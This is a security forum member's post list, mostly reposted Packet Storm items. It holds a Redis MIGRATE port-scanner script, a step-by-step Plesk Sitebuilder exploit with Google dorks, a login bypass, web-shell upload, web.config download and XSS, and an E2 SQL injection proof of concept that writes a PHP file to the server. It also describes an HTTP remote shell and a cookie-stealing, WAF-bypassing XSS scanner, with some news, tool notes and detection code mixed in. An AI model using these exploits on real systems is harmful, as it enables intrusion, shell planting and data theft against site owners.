Fi8sVrs

Active Members
  • Posts

    3206
  • Joined

  • Days Won

    87

Everything posted by Fi8sVrs

  1. actually they are WordPress themes U-Media › Log In
  2. @lehelke contact the author privately, topic dead since 2013
  3. https://rstforums.com/forum/82323-rst-ssh-brute-force-tool-python.rst
  5. This python script port scans a host using a redis server.

         #!/usr/bin/python
         # Thu Feb 13 16:55:32 UTC 2014 <aramosf @ unsec.net>
         #
         # Scan a host using redis server.
         # Using MIGRATE response:
         # MIGRATE 127.0.0.1 21 a 1 1
         #-IOERR error or timeout writing to target instance
         #MIGRATE 127.0.0.1 22 a 1 1
         #-IOERR error or timeout reading from target node

         import socket
         import sys
         import string

         if len(sys.argv) < 4:
             print sys.argv[0] + " [redis IP] [redis PORT] [iP to scan]"
             sys.exit()

         try:
             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         except socket.error:
             print 'Failed'
             sys.exit()

         host = sys.argv[1];
         port = int(sys.argv[2]);
         toscan = sys.argv[3];
         readbuffer=""

         s.connect((host, port))
         message = "set a1 1\r\n"
         try :
             s.sendall(message)
         except socket.error:
             print 'Failed'
             sys.exit()
         reply = s.recv(50)

         for p in range(1, 65535):
             message = "MIGRATE " + toscan + " " + str(p) + " a1 1 3000\r\n";
             #print message
             try :
                 s.sendall(message)
             except socket.error:
                 print 'Failed'
                 sys.exit()

             readbuffer=readbuffer+s.recv(1024)
             temp=string.split(readbuffer, "\n")
             readbuffer=temp.pop( )
             for line in temp:
                 line=string.rstrip(line)
                 #print line
                 if not "writing" in line:
                     print str(p) + " open"
                 if "OK" in line:
                     message = "set a1 1\r\n"
                     #print message
                     s.sendall(message)
                     reply=s.recv(10)

         s.close()

     DEScrypt Ztex Bruteforcer ≈ Packet Storm
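An added detection example, not part of the original post or of Redis itself: the behaviour described above shows up on the Redis side as one client issuing MIGRATE against a single target host across many ports in a short time. The sketch below assumes command logs in Redis MONITOR output format; the sample lines, thresholds and function names are constructed for illustration.

```python
import re
import shlex
from collections import defaultdict

# Constructed MONITOR output (not captured from a real server); addresses are
# from private/documentation ranges.
SAMPLE_MONITOR = '''\
1392310532.050000 [0 10.0.0.5:51234] "set" "a1" "1"
1392310532.100000 [0 10.0.0.5:51234] "MIGRATE" "192.0.2.10" "1" "a1" "1" "3000"
1392310532.200000 [0 10.0.0.5:51234] "MIGRATE" "192.0.2.10" "2" "a1" "1" "3000"
1392310532.300000 [0 10.0.0.5:51234] "MIGRATE" "192.0.2.10" "3" "a1" "1" "3000"
1392310532.400000 [0 10.0.0.5:51234] "MIGRATE" "192.0.2.10" "4" "a1" "1" "3000"
1392310532.500000 [0 10.0.0.5:51234] "MIGRATE" "192.0.2.10" "5" "a1" "1" "3000"
1392310532.600000 [0 10.0.0.5:51234] "MIGRATE" "192.0.2.10" "6" "a1" "1" "3000"
1392310540.000000 [0 10.0.0.9:40000] "MIGRATE" "10.0.0.20" "6379" "user:1" "0" "5000"
1392310541.000000 [0 10.0.0.9:40000] "MIGRATE" "10.0.0.20" "6379" "user:2" "0" "5000"
1392310542.000000 [0 10.0.0.9:40000] "MIGRATE" "10.0.0.20" "6379" "user:3" "0" "5000"
'''

# <timestamp> [<db> <client addr>] "cmd" "arg" ...
LINE_RE = re.compile(r'^(\d+\.\d+) \[(\d+) ([^\]]+)\] (.+)$')


def parse_monitor_line(line):
    """Return (timestamp, client, argv) or None for lines that do not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    try:
        argv = shlex.split(m.group(4))
    except ValueError:  # unbalanced quotes in a truncated line
        return None
    if not argv:
        return None
    return float(m.group(1)), m.group(3), argv


def find_migrate_sweeps(lines, min_ports=5, window=60.0):
    """Flag (client, target) pairs whose MIGRATE calls hit at least
    `min_ports` distinct ports within any `window`-second span."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        ts, client, argv = parsed
        # MIGRATE host port key destination-db timeout
        if argv[0].upper() != "MIGRATE" or len(argv) < 3 or not argv[2].isdigit():
            continue
        client_ip = client.rpartition(":")[0] or client
        events[(client_ip, argv[1])].append((ts, int(argv[2])))

    findings = []
    for (client_ip, target), evs in sorted(events.items()):
        evs.sort()
        counts = defaultdict(int)  # port -> occurrences inside the window
        start = 0
        best = 0
        for ts, port in evs:
            counts[port] += 1
            # Slide the window start forward until it spans <= `window` seconds.
            while ts - evs[start][0] > window:
                old = evs[start][1]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                start += 1
            best = max(best, len(counts))
        if best >= min_ports:
            findings.append(
                {"client": client_ip, "target": target, "distinct_ports": best}
            )
    return findings


if __name__ == "__main__":
    for finding in find_migrate_sweeps(SAMPLE_MONITOR.splitlines()):
        print(finding)
```

Where MIGRATE is not needed at all, disabling it in redis.conf with `rename-command MIGRATE ""` removes the primitive rather than only detecting its use.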
  6. descrypt-ztex-bruteforcer
     =========================

     This project is a proof of concept for the idea that old FPGA boards can be reused for hashcracking purposes. Especially this one shows results outperforming those of GPUs.

     For now it is a bit ugly, and interfaces can be changed without prior notice.

     Building the bitstream
     ----------------------

     Please refer to the BUILD file. Please be aware that building the bitstream takes about 40 minutes.

     Implementation details
     ----------------------

     The design is split into two clock domains: an external one for IO, whose frequency is 48 MHz, and an internal one with a frequency of 240 MHz. That gives a possible speed of 960 MH/s per ZTEX board with a consumption of 40W. For comparison, AMD R290x performs at 120.1 MH/s with a consumption of 300W.

     Unfortunately IO is VERY slow. Without using hardware queues in the FX2 microcontroller it takes 4 cycles per instruction, and there are plenty of assembly instructions for sending a single byte.

     Download Files from GiftsUngiven ≈ Packet Storm
  7. Russian Interior Ministry offers big pile o' roubles for busting pro-privacy browser

     Russia's Interior Ministry has posted a tender seeking parties willing to “study the possibility of obtaining technical information about users (user equipment) TOR anonymous network”.

     The tender appears to be open only to organisations rated to do secret work for the Russian government, but concluding that means the project has political aims may not be sensible. The local Pirate Party told Global Voices they think the project's origin in the Interior Ministry, rather than a military or intelligence agency, is a sign that pornography is the tender's real target.

     It's not unknown for governments to use agencies of convenience to get things done. Government agencies around the world are often terrible at sharing information and assets, as shown by the current push for re-use of code in “government app stores”. So perhaps this really is the Interior Ministry acting without thought to Russia's less-than-encouraging attitude to political views which are at variance with the ruling party's.

     Whatever the aim of the project, there's 3,900,000 roubles - $US 111,000 or £65,500 - up for grabs. ®

     Via Putin: Crack Tor for me and I'll make you a MILLIONAIRE • The Register
  8. Fi8sVrs

    Hello world

    Welcome back!
  9. PyHttpShell is a shell written in python and php, traffic is over http protocol using a server in the middle.

     Features

       • Transport over HTTP/HTTPS.
       • Supports System Proxy Settings.
       • Multiple Hosts/Connections.
       • Download files to client machine.
       • Change Sleep time remotely.
       • Works on Win/MAC/Linux

     Download

     Sources: http://exploit.co.il/hacking/python-http-shell/

     PyHTTPShell | Free software downloads at SourceForge.net
  10. #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
      # Title : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder
      # Author : alieye
      # vendor : http://www.parallels.com/
      # Contact : cseye_ut@yahoo.com
      # Risk : High
      # Class: Remote
      #
      # Google Dork:
      # inurl::2006/Sites ext:aspx
      # inurl::2006 inurl:.ashx?mediaid
      # intext:"© Copyright 2004-2007 SWsoft." ext:aspx
      # inurl:Wizard/HostingPreview.aspx?SiteID
      #
      # Date: 23/07/2014
      # os : windows server 2003
      # poc video clip : http://alieye.persiangig.com/video/plesk.rar/download
      #
      # version : for uploading shell (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2010
      # version : for other bug (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2014
      #++++++++++++++++++++++++++++++++++++++++++++++++++++++++

      1-bypass loginpage (all version)
      http://victim.com:2006/login.aspx
      change url path to http://victim.com:2006/wizard
      ---------------------------------------------------------
      2-uploading shell via Live HTTP Headers(Copyright 2004-2010)
      Tools Needed: Live HTTP Headers, Backdoor Shell
      Step 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspx
      Step 2: Rename your shell to shell.asp.gif and start capturing data with Live HTTP Headers
      Step 3: Replay data with Live HTTP Headers -
      Step 4: Change [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.gif"\r\n] to [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.asp"\r\n]
      Step 5: go to shell path: http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp
      ---------------------------------------------------------
      3-Arbitrary File Download Vulnerability(all version)
      You can download any file from your target
      http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename created&p=filename
      example:
      http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.config
      ---------------------------------------------------------
      4-xss(all version)
      you can inject xss code in all module of this page http://victim.com:2006/Wizard/Edit.aspx
      goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto "Add New Category" and insert xss code in Category description and .... Enjoy
      ---------------------------------------------------------
      5-not authentication for making a website(all version)
      making malicious page and phishing page with these paths
      http://victim.com:2006/Wizard/Pages.aspx
      http://victim.com:2006/Wizard/Edit.aspx
      #++++++++++++++++++++++++++++++++++++++++++++++++++++++++
      [#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir
      [#] Thanks To All cseye members and All Iranian Hackers
      [#] website : http://cseye.vcp.ir/
      #++++++++++++++++++++++++++++++++++++++++++++++++++++++++
      [#] Spt Tnx To Master of Persian Music: Hossein Alizadeh
      [#] Hossein Alizadeh website : http://www.hosseinalizadeh.net/
      [#] download ney-nava album : http://dnl1.tebyan.net/1388/02/2009052010245138.rar
      #++++++++++++++++++++++++++++++++++++++++++++++++++++++++

      Plesk Sitebuilder XSS / Bypass / Shell Upload / File Download ≈ Packet Storm
  11. SILC - Secure Internet Live Conferencing
      ========================================

      SILC (Secure Internet Live Conferencing) is a modern and secure conferencing protocol.

      Features
      ========

      SILC provides all the common conferencing services like private messages, instant messages, channels and groups, and video and audio conferencing. The main difference to other protocols is that SILC has been designed with security as its main feature - it is not an add-on or optional plugin - and security cannot be turned off.

      All SILC connections execute SILC Key Exchange protocol, an authenticated Diffie-Hellman key exchange algorithm, to generate a shared secret session key. All SILC packets exchanged between SILC clients and servers are protected with these keys.

      All private messages (instant messages) are protected with private message keys established using the SILC Key Exchange protocol over the SILC network. Private messages can be read only by the sender and the recipient of the message. SILC servers along the way cannot decrypt the messages. Optionally, private message key may also be a shared secret, such as passphrase, or the SILC Key Exchange may be performed peer-to-peer between clients. If all these methods fail the session keys are used as the last resort fallback to encrypt private messages.

      All channel and group messages are protected with channel specific keys generated by the SILC routers and only the members of the channel may read the messages. Optionally, channel members may set up a shared secret, such as passphrase, as the channel key to exclude SILC routers from knowing the key.

      Running SILC
      ============

      After installing the SILC to the system the SILC client is started by giving command:

          silc

      If you want to run with specific configuration file give -f option.

      To run the server you should configure the server first. To run the server give the command:

          silcd

      This will launch the server on to the background.

      History
      =======

      SILC was developed between 1996 and 1999 and released to public in 2000. SILC was originally developed by Pekka Riikonen.

      Download

      Contact
      =======

      Feedback and comments are welcome. Bug reports should be sent to the development mailing list.

      Official SILC project web site   : SILC - Secure Internet Live Conferencing
      FTP archive for SILC project     : ftp://ftp.silcnet.org/
      Development mailing list address : silc-devel@lists.silcnet.org
      SILC Server                      : /server silc.silcnet.org
  12. E2 version 2844 suffers from a remote SQL injection vulnerability.

      Advisory ID: HTB23222
      Product: Е2
      Vendor: Ilya Birman
      Vulnerable Version(s): v2844 and probably prior
      Tested Version: v2844
      Advisory Publication: July 2, 2014 [without technical details]
      Vendor Notification: July 2, 2014
      Vendor Patch: July 3, 2014
      Public Disclosure: July 23, 2014
      Vulnerability Type: SQL Injection [CWE-89]
      CVE Reference: CVE-2014-4736
      Risk Level: High
      CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
      Solution Status: Fixed by Vendor
      Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

      -----------------------------------------------------------------------------------------------

      Advisory Details:

      High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in Е2, which can be exploited to perform SQL injection attacks and gain control over the vulnerable application.

      1) SQL Injection in Е2: CVE-2014-4736

      The vulnerability exists due to insufficient sanitization of input data passed via the "note-id" HTTP POST parameter to "/@actions/comment-process" URI. A remote attacker can send a specially crafted HTTP POST request, inject and execute arbitrary SQL commands in application’s database.

      Successful exploitation of the vulnerability may allow an attacker to add, modify or delete arbitrary records in database and gain complete access to the web site.

      PoC code below will create a PHP file "/var/www/file.php", containing "phpinfo()" call (if the filesystem permissions and MySQL configuration allow it):

          <form action="http://[host]/@actions/comment-process" method="post" name="main">
          <input type="hidden" name="already-subscribed" value="">
          <input type="hidden" name="comment-id" value="new">
          <input type="hidden" name="elton-john" value="1">
          <input type="hidden" name="email" value="mail@mail.com">
          <input type="hidden" name="from" value="">
          <input type="hidden" name="name" value="name">
          <input type="hidden" name="subscribe" value="on">
          <input type="hidden" name="text" value="1">
          <input type="hidden" name="note-id" value="' UNION SELECT '<? phpinfo(); ?>',2,3,4,5,1,7,8,9,10,11,12,13,14,15 INTO OUTFILE '/var/www/file.php' -- 2">
          <input type="submit" id="btn">
          </form>

      -----------------------------------------------------------------------------------------------

      Solution:

      Update to Е2 version v2845

      More Information:
      http://blogengine.ru/download/

      -----------------------------------------------------------------------------------------------

      References:

      [1] High-Tech Bridge Advisory HTB23222 - https://www.htbridge.com/advisory/HTB23222 - SQL Injection in Е2.
      [2] Е2 - http://blogengine.ru/ - E2 is a perfect engine for blogging.
      [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
      [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
      [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

      -----------------------------------------------------------------------------------------------

      Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

      http://packetstormsecurity.com/files/download/127594/e2-sql.txt
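An added illustration of the flaw class in the advisory above and its fix, not taken from the advisory or from E2's code: a "note-id" value concatenated into a query lets a UNION clause return rows from another table, while strict integer parsing plus a bound parameter does not. The schema, data and function names are hypothetical, and SQLite stands in for MySQL, so the INTO OUTFILE step is not reproduced.

```python
import sqlite3

# Constructed payload with the same shape as the advisory's "note-id" value
# (quote break-out, UNION SELECT, trailing comment).
UNION_PAYLOAD = "' UNION SELECT login, pw_hash FROM users -- 2"


def make_db():
    """Build an in-memory database with a hypothetical schema and sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE notes (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (login TEXT, pw_hash TEXT);
        INSERT INTO notes VALUES (1, 'First note');
        INSERT INTO users VALUES ('admin', 'constructed-hash');
        """
    )
    return conn


def lookup_note_vulnerable(conn, note_id):
    """Deliberately vulnerable: the POST value is pasted into the SQL text."""
    sql = "SELECT id, title FROM notes WHERE id = '" + note_id + "'"
    return conn.execute(sql).fetchall()


def parse_note_id(raw):
    """Accept only a plain decimal integer; reject everything else."""
    if not isinstance(raw, str) or not raw.isascii() or not raw.isdigit():
        raise ValueError("note-id must be a decimal integer")
    return int(raw)


def lookup_note_hardened(conn, note_id):
    """Validate the type first, then pass the value as a bound parameter."""
    sql = "SELECT id, title FROM notes WHERE id = ?"
    return conn.execute(sql, (parse_note_id(note_id),)).fetchall()


def lookup_note_bound_only(conn, note_id):
    """Binding alone: the payload is compared as data and matches nothing."""
    sql = "SELECT id, title FROM notes WHERE id = ?"
    return conn.execute(sql, (note_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal id :", lookup_note_vulnerable(db, "1"))
    print("vulnerable, payload   :", lookup_note_vulnerable(db, UNION_PAYLOAD))
    print("bound only, payload   :", lookup_note_bound_only(db, UNION_PAYLOAD))
    try:
        lookup_note_hardened(db, UNION_PAYLOAD)
    except ValueError as exc:
        print("hardened, payload     : rejected:", exc)
```

On the MySQL side, the file write in the PoC additionally depends on the database account holding the FILE privilege and on the `secure_file_priv` setting, which is the "MySQL configuration" condition the advisory mentions.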
  13. https://rstforums.com/forum/articole.rst happy reading
| Inbox: False | Blacklist: Not Listed | Time: 23.07.2014 - 16:25:57
  15. SMTPTX is a very simple tool used for sending simple email and doing some basic email testing from a pentester perspective. It's able to send messages without depending on knowing a specific MTA/SMTP server beforehand. Unlike tools like sendemail, it handles the MX record resolution itself, connects to the relevant server and sends the email. It's able to add attachments, use TLS and do SMTP authentication, specify custom DNS servers and SMTP servers, etc. More features are under way.

The tool is intended to be used when assessing the functionality and basic configuration and security settings of SMTP servers and other pentesting oriented tasks. It may also be useful as a system tool in scripts and such for sending logs and such off of a system or anything that makes the life of the legit user/administrator easier.

What SMTPTX isn't

The tool is NOT a spam tool and was never intended to be such a tool. Thus SMTPTX is not permitted to be used as such! The author of SMTPTX cannot be held responsible for any illegal use of the tool.

Beta Code

The tool is currently in a beta state as it has not been extensively tested. Only the intended basic functionality has been verified under optimal conditions. Bugs and feature suggestions may be sent my way and I'll try to fix/implement them in a somewhat near future. No promises are being made though, as I lead a very busy life.

The code has only been tested on Linux (Debian/Kali) as I rarely use Windows. And as such, I don't know how it will behave on Windows or Mac. However, I don't see any reasons why it shouldn't run on those platforms.

Further options are planned for SMTPTX, such as VRFY, custom EHLO, logging to file and a few more. I'm also thinking of implementing interactive mode and perhaps some basic dictionary attack features etc. Time will tell for sure.
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#==============================================================================
# Title         : SMTPTX
# Dependencies  : Python v2.7 and Python DNS Toolkit (www.dnspython.org)
# Version       : 1.0 Beta
# Author        : Copyright © 2014 <circle@0x90.se>, http://www.0x90.se
# Thanks/Creds  :
# Abstract      : This very simple tool is used for sending simple email and
#                 do some basic email testing from a pentester perspective.
#                 Its able to send messages without depending on an specific
#                 MTA/SMTP server. Unlike tools like sendemail it handles the
#                 MX record resolution itself and connects to the relevant
#                 server and sends the email. Knowing the address of the
#                 specific SMTP server is thus not necessary.
#
# License       : This code is free and released under the terms of GPL v3
#
# Issues        : First pre-production == Some issues do exist and functions
#                 ARE missing. It is NOT very fault tolerant at all!
#                 The basic stuff seem to work, no extensive tests has been
#                 done! The code has been tested only on Linux (Debian & Kali)
#
# Todo          : Near future improvements:
#                 - Ability to accept domain only when resolving SMTP servers
#                   and not rely on a full email address
#                 - Add custom EHLO host, VRFY and the like options
#                 - Add logging to file
#                 - Add 'quiet' option in order to suppress all output
# Todo          : Later improvements:
#                 - Structure the code in a better manner
#                 - Perhaps add interactive mode
#
# Change log    : Initial release == Bugs for sure!
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND ANY CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR ANY CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
# THIS PROGRAM MAY NOT BE USED IN ANY ILLEGAL ACTIVITIES!
#
#==============================================================================

import sys
import os
import getopt
import time
import re
import smtplib
import email.utils
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
from email.MIMEBase import MIMEBase
from email import Encoders


def banner():
    print(" ")
    print("===========================================================================")
    print(" SMTPTX v1.0 Beta by <circle@0x90.se>, http://www.0x90.se GPL v3 ")
    print(" A small and very simple email testing tool ")
    print("===========================================================================")
    print(" ")


def usage():
    print(" ")
    print(" -h --help ")
    print(" Help section, and you are looking at it ")
    print(" ")
    print(" -f --from <FROM_ADDRESS> ")
    print(" If no from address is used, someone@somewhere.com will be used instead ")
    print(" ")
    print(" -t --to <TO_ADDRESS> ")
    print(" If no to address is given, the from address will be used (relay test) ")
    print(" ")
    print(" -m --message <MESSAGE> ")
    print(" Plain text or HTML. If no message is given, time and date will be used ")
    print(" ")
    print(" -s --subject <SUBJECT> ")
    print(" If no subject is given, the default string \"This is a test\" is used ")
    print(" ")
    print(" -a --attachment <FILENAME> ")
    print(" Given in the form of a path: \\path\\to\\file ")
    print(" ")
    print(" -d --dns <IP_ADDRESS> ")
    print(" Use a custom DNS server for resolving MX records ")
    print(" ")
    print(" -T --dns-timeout <SECONDS> ")
    print(" Set a custom DNS resolution timeout in seconds. Default is 3s ")
    print(" ")
    print(" -S --smtp-server <SMTP_SERVER> ")
    print(" Use a specific SMTP server ")
    print(" ")
    print(" -p --smtp-port <PORT> ")
    print(" Use a non-standard port for the remote SMTP server. Default is 25 ")
    print(" ")
    print(" -U --username <USERNAME> ")
    print(" Username for SMTP server authentication ")
    print(" ")
    print(" -P --password <PASSWORD> ")
    print(" Password for SMTP server authentication ")
    print(" ")
    print(" -r --resolve ")
    print(" Only resolve SMTP server(s) for a given email address. No email is sent")
    print(" Must be used in conjunction with option: -t ")
    print(" ")
    print(" -v --verbose ")
    print(" Verbose output. Add extra status messages to standard output ")
    print(" ")
    print(" -e --use-tls ")
    print(" Use encryption capabilities if SMTP server supports it ")
    print(" ")
    return


def resolve_smtp_server(optsData):
    """
    Resolve the MX record of the given email domain name e.g. hotmail.com and
    return a list with SMTP servers. This is kinda dirty since the DNS query
    returns an object and the documentation is missing some information on
    this. Or perhaps its just the ignorant self...
    TODO:
    """
    smtpServers = []
    dnsResolver = dns.resolver.Resolver()
    dnsResolver.timeout = optsData['dnstimeout']
    dnsResolver.lifetime = optsData['dnstimeout']

    if optsData['dns']:
        print (" Using custom DNS Server: %s" % optsData['dns'])
        dnsResolver.nameservers = [optsData['dns']]

    matchDomain = re.match(r'.*@(.*)', optsData['to'], re.M | re.I)
    mailDomain = matchDomain.group(1)
    print (" Resolving MX records for: %s\n" % mailDomain)

    try:
        # Query through the configured resolver object so that the custom
        # DNS server and timeout are actually used (the module-level
        # dns.resolver.query() ignores them)
        mxQuery = dnsResolver.query(mailDomain, 'MX')
    except dns.exception.DNSException as dnsError:
        print(" A DNS error was encountered! Reason:\n")
        print(dnsError)
        sys.exit(1)

    print (" Resolved %i SMTP host(s)" % (len(mxQuery)))
    print ("")

    # Populate the hosts list with SMTP servers
    for mxData in mxQuery:
        mxRecord = repr(mxData.exchange)
        mxString = re.match(r'<DNS name (.*)\.>$', mxRecord, re.M | re.I)
        mxHost = mxString.group(1)
        try:
            # Give us the IP address of each MX host
            aQuery = dnsResolver.query(mxHost, 'A')[0].address
        except dns.exception.DNSException as dnsError:
            print(" A DNS error was encountered! Reason:\n")
            print(dnsError)
            sys.exit(1)
        print(" - %s -> %s" % (mxHost, aQuery))
        smtpServers.append(mxHost)

    print("")
    optsData['smtpServer'] = smtpServers[0]
    return


def send_email(optsData):
    """
    Send the email based on the dictionary passed to this function.
    TODO:
    """
    emailMessage = MIMEMultipart()
    emailMessage['To'] = email.utils.formataddr(('', optsData['to']))
    emailMessage['From'] = email.utils.formataddr(('', optsData['from']))
    emailMessage['Subject'] = optsData['subject']
    emailMessage.attach(MIMEText(optsData['message']))

    if optsData['attachment']:
        add_attachment(optsData, emailMessage)

    if optsData['verbose']:
        print (" This is what will be sent:\n")
        print (emailMessage.as_string())
        if optsData['attachment']:
            print (" Attached file: %s\n" % optsData['attachment'])

    try:
        if optsData['verbose']:
            print (" Using SMTP server: %s:%d\n" % (optsData['smtpServer'], optsData['smtpPort']))
        smtpHandler = smtplib.SMTP(optsData['smtpServer'], optsData['smtpPort'])
        smtpHandler.set_debuglevel(optsData['verbose'])

        # We need to perform a EHLO in order to get a list of supported features
        smtpHandler.ehlo()

        if optsData['usetls']:
            if smtpHandler.has_extn('STARTTLS'):
                try:
                    print ("\n Server supports TLS, using it...\n")
                    smtpHandler.starttls()
                except smtplib.SMTPException as smtpError:
                    print (" Failure of biblical proportions! Unable to send email. Reason:\n")
                    print (" %s\n" % smtpError)
                    sys.exit(1)
            else:
                print (" Server does not seem to support TLS, skipping...\n")
            # Reidentify over TLS if set up
            smtpHandler.ehlo()

        if optsData['username'] and optsData['password']:
            try:
                smtpHandler.login(optsData['username'], optsData['password'])
            except smtplib.SMTPAuthenticationError:
                print(" Authentication failure!\n")
                print(" Will try to ignore...\n")

        smtpHandler.sendmail(optsData['from'], [optsData['to']], emailMessage.as_string())
        smtpHandler.quit()
        print ("\n The email has been sent!\n")
    except smtplib.SMTPException as smtpError:
        print (" Failure of biblical proportions! Unable to send email. Reason:\n")
        print (" %s\n" % smtpError)
        sys.exit(1)
    return


def add_attachment(optsData, emailMessage):
    """
    Add any type of attachment to the email.
    TODO: Add attachment size check?
    """
    part = MIMEBase('application', "octet-stream")
    # part.set_payload(open(optsData['attachment'], "rb").read())
    try:
        attachment = open(optsData['attachment'], "rb")
    # We will exit as a safety precaution as we perhaps don't want to screw up for
    # example a social engineering campaign due to a simple file not found error!
    except IOError as fileError:
        print(" Unable to open the attachment file! Reason:\n")
        print(fileError)
        sys.exit(1)

    part.set_payload(attachment.read())
    Encoders.encode_base64(part)
    part.add_header('Content-Disposition', 'attachment; filename=%s' % os.path.basename(optsData['attachment']))
    emailMessage.attach(part)
    return


def main():
    """
    Main function and argument collector/processor
    TODO:
    """
    optsData = {'to': '',
                'from': 'someone@somewhere.com',
                'subject': 'This is a test',
                'message': time.asctime(time.localtime(time.time())),
                'verbose': False,
                'smtpServer': '',
                'smtpPort': 25,
                'dns': '',
                'dnstimeout': 3,
                'resolve': False,
                'attachment': '',
                'username': False,
                'password': False,
                'usetls': False}

    banner()

    try:
        if len(sys.argv) < 2:
            print("Too few arguments supplied...")
            usage()
            sys.exit(1)
        opts, args = getopt.getopt(sys.argv[1:], "hvf:t:m:s:d:T:S:p:ra:U:P:e",
                                   ["help", "verbose", "from=", "to=", "message=",
                                    "subject=", "dns=", "dns-timeout=",
                                    "smtp-server=", "smtp-port=", "resolve",
                                    "attachment=", "username=", "password=",
                                    "use-tls"])
    except getopt.GetoptError as err:
        print(err)
        usage()
        sys.exit(1)

    for opt, arg in opts:
        if opt in ('-h', '--help'):
            usage()
            sys.exit(2)
        elif opt in ('-v', '--verbose'):
            optsData['verbose'] = True
        elif opt in ('-f', '--from'):
            optsData['from'] = arg
        elif opt in ('-t', '--to'):
            optsData['to'] = arg
        elif opt in ('-s', '--subject'):
            optsData['subject'] = arg
        elif opt in ('-m', '--message'):
            optsData['message'] = arg
        elif opt in ('-d', '--dns'):
            optsData['dns'] = arg
        elif opt in ('-T', '--dns-timeout'):
            optsData['dnstimeout'] = int(arg)
        elif opt in ('-a', '--attachment'):
            optsData['attachment'] = arg
        elif opt in ('-S', '--smtp-server'):
            optsData['smtpServer'] = arg
        elif opt in ('-p', '--smtp-port'):
            optsData['smtpPort'] = int(arg)
        elif opt in ('-r', '--resolve'):
            optsData['resolve'] = True
        elif opt in ('-U', '--username'):
            optsData['username'] = arg
        elif opt in ('-P', '--password'):
            optsData['password'] = arg
        elif opt in ('-e', '--use-tls'):
            optsData['usetls'] = True
        else:
            usage()
            sys.exit(1)

    if optsData['resolve']:
        if not optsData['to']:
            print(" Error: No recipient address was given!")
            usage()
            sys.exit(1)
        resolve_smtp_server(optsData)
        sys.exit(0)

    # Fall back to the from address when no recipient was given (relay test),
    # as described in usage()
    if not optsData['to']:
        optsData['to'] = optsData['from']

    if optsData['smtpServer']:
        send_email(optsData)
    else:
        resolve_smtp_server(optsData)
        send_email(optsData)


if __name__ == "__main__":
    try:
        import dns.resolver
        import dns.exception
    except ImportError:
        print(" Import Error: You seem to be missing the DNS Python library! ")
        print(" Either check your installation or go to www.pythondns.org ")
        print(" Also try using: sudo pip install dnspython ")
        sys.exit(1)
    main()

# ---[ EOF ]---
```

Source
  16. XSSYA is a Cross Site Scripting Scanner & Vulnerability Confirmation (Working in two Methods)

• Method number 1 for Confirmation: Request and Response
• Method number 2 for Confirmation: Execute encoded payload and search for the same payload in web HTML code but decoded
• Support HTTPS
• After Confirmation (execute payload to get cookies)
• Identify 3 Types of WAF (Mod_Security - WebKnight - F5 BIG IP)
• Can be run in (Windows - Linux)

XSSYA Continue Library of Encoded Payloads To Bypass WAF (Web Application Firewall)

It Also Support Saving the Web HTML Code Before Executing the Payload, Viewing the Web HTML Code into the Screen or Terminal

$ python xssya.py

Links should end with (/ or = or ?)

Example:

$ python xssya.py
http://www.domain.com/
http://www.domain.com=
http://www.domain.com?

The only Module need to download is colorama-0.2.7: https://pypi.python.org/pypi/colorama

Note: Crawling (need to be enhanced)

Download: XSSYA Cross Site Scripting Scanner ≈ Packet Storm

Author: Yehiamamdouh51@hotmail.com

